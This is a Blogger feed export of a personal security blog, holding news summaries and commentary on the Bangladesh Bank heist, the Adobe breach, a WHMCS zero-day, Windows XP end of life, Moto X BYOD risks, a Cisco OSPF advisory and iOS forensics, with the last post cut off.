tag:blogger.com,1999:blog-90131591243437828432024-03-12T21:33:27.193-07:00TechJournalKiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comBlogger213125tag:blogger.com,1999:blog-9013159124343782843.post-67311839459399704322016-05-03T08:17:00.002-07:002016-05-03T08:17:30.581-07:00Bangladesh Bank Heist<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://3.bp.blogspot.com/-1J2-LUlsE1s/Vyi7uOrU9EI/AAAAAAAAD4Y/cuwiA9rx5SQWbiX58lz961T0PrT09QaAwCLcB/s1600/bbank.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="360" src="https://3.bp.blogspot.com/-1J2-LUlsE1s/Vyi7uOrU9EI/AAAAAAAAD4Y/cuwiA9rx5SQWbiX58lz961T0PrT09QaAwCLcB/s640/bbank.jpg" width="640" /></a><br />
<br />
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Bangladesh Bank hack is one of the biggest bank heists in global financial history. There have been larger scams and scandals, but cyber heists from a single bank, this takes the cake.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The heist of over $80 million sent shock-waves through the global financial system and security experts scrambled to find out how it had happened. Political and administrative authorities played the blame game, as was expected of them. Resignations were offered and statements were issued. It was a complete chaos.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
But now, the storm is over and the dust seems to be settling. But as the bigger picture comes into focus, it is becoming clearer as to what exactly went wrong. </div>
<h2 style="border: 0px; box-sizing: border-box; color: #737679; font-family: helvetica, arial, sans-serif; font-size: 32px; font-stretch: inherit; font-weight: 400; line-height: 1.25; margin: 0px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
How it happened</h2>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
It all began on one fateful Friday with a printer failure. On 5 February 2016, Jubair Bin Huda, the bank’s joint director for accounts, discovered the printer failure which left him unable to collect the previous day’s transactions, Financial Times <a href="http://www.ft.com/cms/s/0/39ec1e84-ec45-11e5-bb79-2303682345c8.html" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">reports</a>. The printer failure was just a tip of the iceberg though. Three days later, the bank discovered that the printer was not the only thing that had failed. The magnitude of the theft suggested that the bank’s cyber security system did not fare much better.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The hackers managed to break into the bank’s security system and transferred more than $80 million from the New York Federal Reserve account to multiple bank accounts located in Sri Lanka and Philippines. A significant number of transfer requests, 30 out of 35, were blocked by the Federal Reserve, saving the bank a loss of $850 million. But the five requests that managed to pass through, amounting to more than a 80 million dollars, were devastating enough in their consequences.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Security analysts <a href="http://www.reuters.com/article/us-usa-fed-bangladesh-malware-idUSKCN0WD1EV" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">suggest</a> that they did it by installing a malware on one of bank’s computers which enabled them to spy on the bank’s monetary activities for weeks to observe how money transfers took place.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
However, investigators <a href="http://news.softpedia.com/news/second-hand-switches-no-firewall-custom-malware-facilitated-bank-cyber-heist-503388.shtml" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">believe</a> that the heist involved hackers utilizing a Remote Access Trojan (RAT). Through this, they were able to secure remote control to the bank’s computers to initiate funds transfer. It may have taken the hackers almost a year of planning and preparations which involved opening multiple accounts in various banks of Philippines and Sri Lanka through fake documentation. It is ironic, though, that despite all the meticulous planning, <a href="http://www.reuters.com/article/us-usa-fed-bangladesh-typo-insight-idUSKCN0WC0TC" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">a typo</a> in a transfer request turned out to be the Achilles heel, and helped uncover the entire operation.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://www.bbc.com/news/technology-36110421" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">According to BBC</a>, the bank didn't have a firewall and used cheap $10 internet routers. This just made the malicious actors job very easy. Good prevention and detection controls would at least have helped detect the whole operations much sooner.</div>
<h2 style="border: 0px; box-sizing: border-box; color: #737679; font-family: helvetica, arial, sans-serif; font-size: 32px; font-stretch: inherit; font-weight: 400; line-height: 1.25; margin: 0px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
SWIFT software security</h2>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Perhaps the most troubling aspect of the whole episode was that the hackers managed to hack into the SWIFT software. SWIFT, lies at the heart of the global financial system and is a network which connects majority of the world’s financial institutions and enables them to send and receive financial information about financial transactions.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
However, It was the bank's systems or controls that were compromised, not the software, <a href="http://www.bankinfosecurity.com/bangladesh-bank-heist-lessons-learned-a-9064/op-1" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">according to</a> an independent security consultant, William Murray. "The SWIFT software behaved as it was intended to, but was not operated by the intended person or process. This is a bank problem, not a SWIFT problem." </div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The major take-away from this is that financial institutions must pay extra attention to ensure the protection of the computers with the SWIFT software installed.</div>
<h2 style="border: 0px; box-sizing: border-box; color: #737679; font-family: helvetica, arial, sans-serif; font-size: 32px; font-stretch: inherit; font-weight: 400; line-height: 1.25; margin: 0px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
Takeaways</h2>
<h3 style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.85098); font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-stretch: inherit; font-weight: 400; line-height: 1.2; margin: 0px 0px 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Cyber Security is not an IT problem</h3>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
It is a business problem. Businesses should view cyber risk on par with operation, regulatory and financial risk. Unfortunately, most organization boards fail to recognize this.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Lutfus Sayeed, an Information Systems professor at California State University, believes that cyber security must be incorporated into any organization’s central business strategy. IT Security must have a seat at the boardroom, at the executive table. It must not be viewed as a specialized function that is detached from the core business processes.</div>
<h3 style="border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.85098); font-family: helvetica, arial, sans-serif; font-size: 20px; font-stretch: inherit; font-weight: 400; line-height: 1.2; margin: 0px 0px 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Cyber Security is not a checklist</h3>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: "georgia" , "times new roman" , serif;">Security should not be a compliance checklist, regulatory or otherwise. You will never be secure by being compliant. You will always be compliant by practicing good security processes. A learned friend, who was involved with ensuring a major card compliance program is implemented at banks worldwide, reveals, many banks in the east, would just write-off compliance fines and pay them, rather than comply. They consider it more cost-effective.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Bangladesh bank heist, has hopefully driven the point, that cybersecurity cannot be an afterthought. The business impact of poor cybersecurity practices are harsh and real.</div>
<h3 style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.85098); font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-stretch: inherit; font-weight: 400; line-height: 1.2; margin: 0px 0px 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Cyber Security needs attention</h3>
<div>
<br /></div>
<div>
<span style="color: #232629; font-family: "georgia" , serif; font-size: 18px; line-height: 32px;">Cyber Security is a critical business function that needs attention. Organizations that do not have resources to manage cybersecurity should look at Managed Security Service Providers for assistance. </span><br />
<span style="color: #232629; font-family: "georgia" , serif; font-size: 18px; line-height: 32px;"><br /></span></div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The business impact of poor cybersecurity practices are harsh and real. Don't let your businesses fall victim to cyber threats.</div>
</div>
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-60252278393384174312014-01-23T02:36:00.001-08:002014-01-23T02:37:00.066-08:00sales pitch<div dir="ltr" style="text-align: left;" trbidi="on">
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/30253118?rel=0" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="427"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/slidesthatrock/your-sales-pitch-sucks" target="_blank" title="Your Sales Pitch Sucks!">Your Sales Pitch Sucks!</a> </strong> from <strong><a href="http://www.slideshare.net/slidesthatrock" target="_blank">Slides That Rock</a></strong> </div>
<br /></div>
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-71750819026539861532013-10-07T12:30:00.002-07:002013-10-07T12:30:24.345-07:00Sudo Make me a sandwich<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Android 4.0 + Security in the face of Custom ROMs<br />
<br />
<br /></div>
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/JBGJe0uVSLY" width="420"></iframe>
<br />
<br />
<span style="background-color: white; font-family: Arial; font-size: 12px; line-height: 19px; text-align: justify;">Max will give an overview of Android’s device protection mechanisms in 4.0+ and how they can be circumvented or unintentionally undermined by device manufacturers, 'cause each device manufacturer or carrier can add or modify code from the Android Open Source Project (AOSP). This can include access to device memory, exploitable processes which run as the root user, initialization scripts which perform privileged actions without proper validation, or APKs which leak access to otherwise-protected information sources. The talk will also detail /boot and /recovery differences between OEMs, how signature checks are performed, and demonstrate some of our tools to examine new devices and find potential security flaws.</span><br />
<div>
<span style="background-color: white; font-family: Arial; font-size: 12px; line-height: 19px; text-align: justify;"><br /></span></div>
</div>
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-16426652497761227962013-10-07T11:07:00.001-07:002013-10-07T11:07:09.116-07:00Adobe breached, compromised source code<div dir="ltr" style="text-align: left;" trbidi="on">
In a blog post on Thursday, Adobe said that during a security audit sometime around September 17, the company discovered that attackers had accessed Adobe customer IDs, as well as encrypted passwords. In addition to IDs and passwords, Adobe Chief Security Officer, Brad Arkin, said that the attackers also accessed customer names, encrypted credit and debit card numbers, expiration dates and "other information."<br />
<br />
"At this time, we do not believe the attackers removed decrypted credit or debit card numbers from our systems". Question, why is that information not encrypted in the first place. What is the need to store them unencrypted.<br />
<br />
In all, Adobe says that the breach impacts some 2.9 million customers worldwide, and that they're in the process of sending out notifications to those who had credit or debit card details compromised. Further, Adobe has alerted the banks processing customer payments, in order for them to help protect accounts upstream.<br />
<br />
Adobe admitted that source code was breached during the incident. It wouldn't comment which product lines were breached. Adobe is the most commonly used product in almost every system out there. In theory this could mean, that their software could have more 0-days than what we are aware of. It could also mean that the current versions may have been altered, and backdoored already.<br />
<br />
The earliest known date of discovery is September 17, but Adobe hasn't said how long the attackers have had possession of the stolen source code, nor can they comment on how far it's spread online. Last week, reporter Brian Krebs, found 40 GB worth of Adobe's proprietary data on a server used by criminals, but by the time he found it, Adobe was already investigating its theft.<br />
<br />
In an advisory to customers, Adobe confirmed that the source code theft impacted Adobe Acrobat, ColdFusion, ColdFusion Builder and "other Adobe products." As to what those other products are, Adobe didn't say. And why would they !!!!<br />
<br />
Adobe recommends that customers update to the latest supported software versions, and that they download the newest releases when they're made available on October 8.<br />
<br /></div>
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-88860975681599805672013-10-07T10:55:00.000-07:002013-10-07T10:55:28.774-07:00WHMCS - 0day<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hong Kong-based PureVPN faced problems this weekend, after someone used a Zero-Day vulnerability in WHMCS to send the networking firm's customers an alarming message. The rogue email stated that the VPN service was going to shutdown due to legal issues, and that customer information was handed over to the authorities.<br />
<br />
Addressed simply as "Dear Customer" the letter said that due to an incident, PureVPN would be closing accounts and were no longer able to run an anonymization service. In addition, it said the company "had to handover all [customer] information to the authorities."<br />
<br />
The letter was signed by Uzair Gadit, the co-Founder of PureVPN, who took to his company's blog and Twitter on Saturday to dispute the claims it made. According to a second email delivered to customers, the cause for the letter was a <span style="background-color: yellow;"><a href="http://blog.whmcs.com/?t=79427" rel="nofollow" target="_blank">vulnerability in WHMCS</a></span> — a platform used by many service providers like PureVPN, to manage user registrations and accounts, as well as billing and support.<br />
<br />
"Preliminary reports suggest that we are hit with a zero day exploit, found in [WHMCS]...We are able to confirm that the breach is limited to a subset of registered users Email IDs and names," a blog post by PureVPN explained.<br />
<br />
The WHMCS vulnerability was disclosed last week in versions 5.2.7 and 5.1.9. Moreover, proof-of-concept code for launching an SQL Injection attack spread to a few different exploitation-based forums and places like Pastebin. The flaw itself resides in dbfunctions.php (update_query), and requires that the attacker have an account on the system; something that is easily done considering the nature of WHMCS.<br />
<br />
At issue is the fact that the script trusts any SQL update that has a value starting with AES_ENCRYPT. As it was explained to CSO, this was a case of missing input validation checks, a common (yet risky) coding error.<br />
<br />
It's unclear if there are any other websites targeted by those responsible for the PureVPN compromise. CSO asked PureVPN, since given the nature of the vulnerability itself, if it can be disproved that the entire email database was accessed, but the company didn't respond to questions.</div>
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-58837613370247160782013-10-07T10:51:00.000-07:002013-10-07T10:51:09.656-07:00XP not dead yet<div dir="ltr" style="text-align: left;" trbidi="on">
<h1 style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 20px; margin: 0px 0px 10px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-weight: normal; line-height: 18px;"><a href="http://www.csoonline.com/article/741080/despite-looming-end-of-life-study-shows-xp-remains-primary-os?source=rss_cso_exclude_net_net" rel="nofollow" target="_blank">A recent series of customer studies by mobile management firm Fiberlink shows a pattern of risky behavior, and widespread usage of a soon to be dead operating system</a></span></h1>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Examining data from one million devices, <a href="http://www.maas360.com/" style="color: #006699; text-decoration: none;">Fiberlink</a>, a mobile management firm, examined the often forgotten part of mobility in the workforce — laptops. While IT and security vendors focus on Google's Android, Apple's iOS, tablets, and smartphones, Lenovo's ThinkPad and Dell's Latitude chug along, remaining a stable fixture in the workplace. According to Fiberlink, almost 50 percent of the laptops observed in their study are running Windows XP.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Not counting extended support contracts, in April 2014, IT and security managers will be forced to face the fact that Windows XP has reached end of life. As is the case with other operating systems, XP will remain as a legacy installation and cause its own share of risk in some cases. However, the explosion of mobile in the work force, which includes laptops procured years ago that now live their life in a constant state of rotation between staff, means that organizations will have some choices to make.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
"Looking at the laptops we manage, we see close to 50 percent of customer devices that need to upgrade or be replaced by that time. When speaking with our customers, they are typically not enthused with migrating to Windows 8, which leaves them in a situation where many are going to upgrade to Windows 7 instead or are waiting to see what Windows 8.1 is going to bring to the table," Fiberlink explained in an email to CSO.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Organizations have had some time to prepare for the change from XP, but that doesn't mean that such deployments are finished. However, CSO was curious about the mindset of many IT managers when it came to OS changes and security, particularly management. When considering the two, IT has been looking at platforms that enable them to manage employee-owned and corporate-assigned devices from one instance, and lucky for them — there are <a href="http://www.air-watch.com/" style="color: #006699; text-decoration: none;">plenty</a> of <a href="http://www1.good.com/" style="color: #006699; text-decoration: none;">vendors</a> that <a href="http://www.landesk.com/" style="color: #006699; text-decoration: none;">claim to do this</a> in the <a href="http://www.mobileactivedefense.com/" style="color: #006699; text-decoration: none;">MDM</a> market. (<a href="http://www.symantec.com/" style="color: #006699; text-decoration: none;">No, seriously</a><a href="" style="color: #006699;">, </a><a href="http://www.mcafee.com/" style="color: #006699; text-decoration: none;">there's plenty of options</a>.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
"We were surprised to see that almost half of our laptop customers are still running XP. That number continues to shrink every day, but it's still unclear what many CIO's and IT executives will choose as their next move," Chuck Brown, director of product management at Fiberlink, told CSO.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
"We're seeing businesses consider many different options as Windows XP gets closer to the end of its support in April 2014. Potentials options include upgrading employees to Windows 7, waiting to see what Windows 8.1 feels like, and even moving straight to the Windows Surface Pro 2."</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Employee-owned laptops (much like employee-owned tables and phones) are a growing trend and a source of risk. IT doesn't want full control over these devices, but if they're being used to access sensitive data or communications, there needs to be some sort of visibility and management, such as pushing patches or enforcing VPN usage.</div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px;">Speaking to CSO, Brown, said that the enterprise is certainly not abandoning the laptop. In fact, it's quite the opposite as CIO's and IT executives are just as concerned about managing laptops as they are about phones and tablets. All of these devices have the same concerns related to compliance, protecting corporate data and applications. But laptops are just one part of the BYOD profile.</span><br />
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Prior to examining laptop usage, Fiberlink looked at other security metrics, including the use of passcodes on mobile devices. According to a random sampling of 1,000 customers, a majority of the passcodes allowed by IT are simple PINs (93 percent). Of those devices with PINs, 73 percent require a length of 4-5 characters, while 27 percent require greater than five characters.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Further, in July, Fiberlink looked at data risk, and discovered that of those employees who use either a personally owned mobile device, or one issued by their employer, 25 percent of them saved work-related documents into a third-party application (e.g., Dropbox, Quick Office, or Evernote); 20 percent said they've copied work-related documents into personal email; and 18 percent noted that they've used mobile devices to bypass IT's Web filtering policies.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Again, laptops with a soon to be expired OS are just one part of the problem, as this data clearly shows. Long after employees are migrated away from XP, the little things such as weak PINs and risky data handling will still pose the most risk to the business. This is why mobile device usage is such a hot topic, and just like laptops were mid-90s, something that will require planning and time before IT can get a solid handle on it.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Today's workforce is a mash-up of personal and professional gadgets, platforms, services, and applications. IT can no longer sacrifice personal usage over professional, so they're looking for ways to make them work together securely, but making that solution look as good in reality as it does on paper, is easier said than done.</div>
</div>
Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-74907795146851685942013-08-02T07:59:00.001-07:002013-08-02T07:59:07.723-07:00Enterprises warned against first true Google phone, Moto X - CSO Online - Security and Risk<p> <br /> The security nightmare corporations face with the bring-your-own-device (BYOD) trend just got worse with the release of Google's new Moto X. With the Android smartphone unveiled Thursday, Google is hoping to lure customers with a personal digital assistant that's easy to use and can guess what information or services people want by reading emails and schedules and tracking search queries. While all this data collection may make the device invaluable, it also should make corporations very nervous. "It's engineers gone wild," said Roger Entner, principal analyst for Recon Analytics. "The engineers are [saying], 'Oh, wouldn't this be a really cool idea,' but don't think through the repercussions." The ease-of-use features in the Moto X, designed and built by Google-owned Motorola, are likely to tickle consumers while haunting IT security pros. First is the always-on microphone, which a person can use to activate the device using trigger words, such as "OK Google Now," to make phone calls or access services and features. The feature is possible through a special, low-power chip developed by Motorola that keeps the microphone on without draining the battery. The always-ready microphone, coupled with the massive amount of data collection, makes the Moto X a valuable target for cybercriminals and cyberspies, who are already heavily focused on developing malware to take control of Android devices. Security researchers say tools for building and distributing Android malware are getting progressively better in the criminal underground. In 2012, the number of Android malware rose more than 2,500% and accounted for 95% of mobile threats on the Internet, according to Cisco's 2013 Annual Security Report. Malware exists today that can take control of an Android device, if a user can be tricked into installing in infected app from an online store or clicking a malicious link on a text message. "Once that happens, all bets are off, and all these lovely sensors become a continuous sound and video information-gathering tool on your designated target," said Kurt Stammberger, vice president of market development for mobile security vendor Mocana. [Also see: Next iPhone's possible fingerprint reader unlikely to excite buyers | Pentagon nod shows Android can be as secure as Blackberry] Motorola will also provide hands-free authentication with the Moto X, through a plastic token that can be clipped onto clothing that will communicate via near-field communication (NFC). As long as the token is a few feet away, a password won't be necessary to unlock the device. The token will be sold separately, reports said. "I'm sure someone at Black Hat or Defcon will figure out a workaround," William Stofega, analyst for IDC, said, referrring to the two security conferences now under way in Las Vegas. The Moto X is not the first Android phone to have these security-troubling features. The Motorola Droid that debuted last week also has them, industry observers say. However, Google has already proclaimed the Moto X its flagship smartphone and Motorola Mobility is reported to be set to spend as much as $500 million in marketing. Such a push gives the phone a better chance of becoming a success. Google's strategy of making its smartphones as useful as possible is what's needed to drive sales in the consumer market. A phone that can automatically notify the user about traffic conditions before heading to a meeting is certain to please many people. But the data collection necessary to provide such services, as well as the microphone, camera and NFC needed for ease of use, are making it increasingly difficult for companies to have a liberal BYOD policy. "Bring-your-own-device is a security nightmare in general," Entner said. Whether an employee can use their own device to access the corporate network should depend on their job, Stofega said. A chief research officer may not want his location known or to communicate with staff and bosses without strict security controls. "At some point [companies] have to have control at some level of the person and also the intellectual capital that's invested in that person," Stofega said. In the meantime, companies are better offer steering away from the Moto X for now, experts say. "I would not recommend the Moto X to corporate clients until we have a really good understanding and assurances from Google and Motorola on how to combat potential mischief being done with these capabilities," Entner said.</p>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-1493556218661514352013-08-02T07:57:00.001-07:002013-08-02T07:57:30.782-07:00OSPF LSA table vulnerability...most cisco routers vulnerable<p><a href="http://tools.cisco.com/security/center/viewAlert.x?alertId=30210">Alert Details - Security Center - Cisco Systems</a></p><blockquote>Multiple Cisco products are affected by a vulnerability involving the Open Shortest Path First (OSPF) Routing Protocol Link State Advertisement (LSA) database. This vulnerability could allow an unauthenticated attacker to take full control of the OSPF Autonomous System (AS) domain routing table, blackhole traffic, and intercept traffic. The attacker could trigger this vulnerability by injecting crafted OSPF packets. Successful exploitation could cause flushing of the routing table on a targeted router, as well as propagation of the crafted OSPF LSA type 1 update throughout the OSPF AS domain. To exploit this vulnerability, an attacker must accurately determine certain parameters within the LSA database on the target router. This vulnerability can only be triggered by sending crafted unicast or multicast LSA type 1 packets. No other LSA type packets can trigger this vulnerability. OSPFv3 is not affected by this vulnerability. Fabric Shortest Path First (FSPF) protocol is not affected by this vulnerability. Cisco has confirmed the vulnerability in a security advisory and has released software updates.</blockquote>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-89072533804612811282013-08-02T07:15:00.001-07:002013-08-02T07:22:12.997-07:00Investigating iOS Phone Images, File Dumps & Backups | Magnet Forensics<blockquote>As of January 2013, Apple announced it had sold over 500 million iOS devices. While iOS seems to be the leading operating system for tablets worldwide, Android continues to be the leading operating system for mobile phones worldwide. Regardless of the statistics, if you are an active forensic examiner, chances are very high you will need to conduct an examination of an iOS mobile device (if you haven’t several times already). This article will discuss some of the steps involved and areas of interest when conducting an analysis of an iOS device for Internet related activity. Handset Passcodes Depending on the version of iOS, different passcode lengths and complexities are supported. A simple four digit passcode A complex numeric passcode A complex alphanumeric passcode or passphrase In many cases, you will need the passcode in order to obtain a physical image or a file system dump. Depending on the iOS version, device hardware version and passcode complexity, the passcode can sometimes be obtained by the forensic tool (such as Cellebrite) using a bruteforce attack. Physical memory dump vs. file dump vs AFC file backup Depending on the type of investigation, the tools you have available and the version of the iOS phone you need to examine, you may have a choice whether to conduct a physical memory extraction, a file system dump or an Apple File Connection (AFC) backup. When possible, it would be recommended to obtain a full physical memory extraction since that will likely contain data that the file system dump & AFC backup does not (deleted file system data, etc.). Physical memory image This would typically be accomplished using a tool such as Cellebrite, XRY, Lantern, Elcomsoft, MPE or the Zdziarski method1. The result of using one of these tools would either be a bit stream (dd) or a DMG image file that could then be analyzed manually or using a forensic analysis tool. File system dump A file system dump, which is a subset of a physical image, could be performed by several well-known tools such as Cellebrite, Blacklight, Oxygen or XRY. AFC backup Apple file connection (AFC) is used with iTunes to conduct a device backup and can be used to perform a backup of data from the device. For example, EnCase v7 can acquire an iOS device using this technology (requires iTunes to be installed, but not running). An examiner can also look for backups on a computer the device has previously been connected to as another step to analyze data from the device without having access to the device itself. Windows XP: c:\Documents and Settings\\Application Data\Apple Computer\MobileSync\Backup Windows Vista/7/8: c:\users\\AppData\Roaming\Apple Computer\MobileSync\Backup OSX: ~/Library/Application Support/MobilSync/Backup Depending on the version of iOS & iTunes, the backup can be protected with a password, which is used to encrypt the backed up data. This password is independent from the device passcode. File System Encryption Figure 1: http://images.apple.com/iphone/business/docs/iOS_Security_Oct12.pdf Starting with iOS 4 Apple began providing data protection for user data by encrypting the user partition. With the introduction of the iPhone 3GS (and continuing to the current iPhone 5 hardware device), Apple began including a hardware key that is used as part of the encryption process. This means that the physical device is needed in order to get all the components (keys) to successfully decrypt files that are protected with this level of encryption. iOS 5 introduced an additional layer of protection by encrypting files with individual keys. Apple has defined four levels (classes) of protection for user data: NSFileProtectionNone The file has no special protections associated with it. It can be read from or written to at any time. Available in iOS 4.0 and later. Declared in NSFileManager.h. NSFileProtectionComplete The file is stored in an encrypted format on disk and cannot be read from or written to while the device is locked or booting. Available in iOS 4.0 and later. Declared in NSFileManager.h. NSFileProtectionCompleteUnlessOpen The file is stored in an encrypted format on disk and must be opened while the device is unlocked. Once open, your file may continue to access the file normally, even if the user 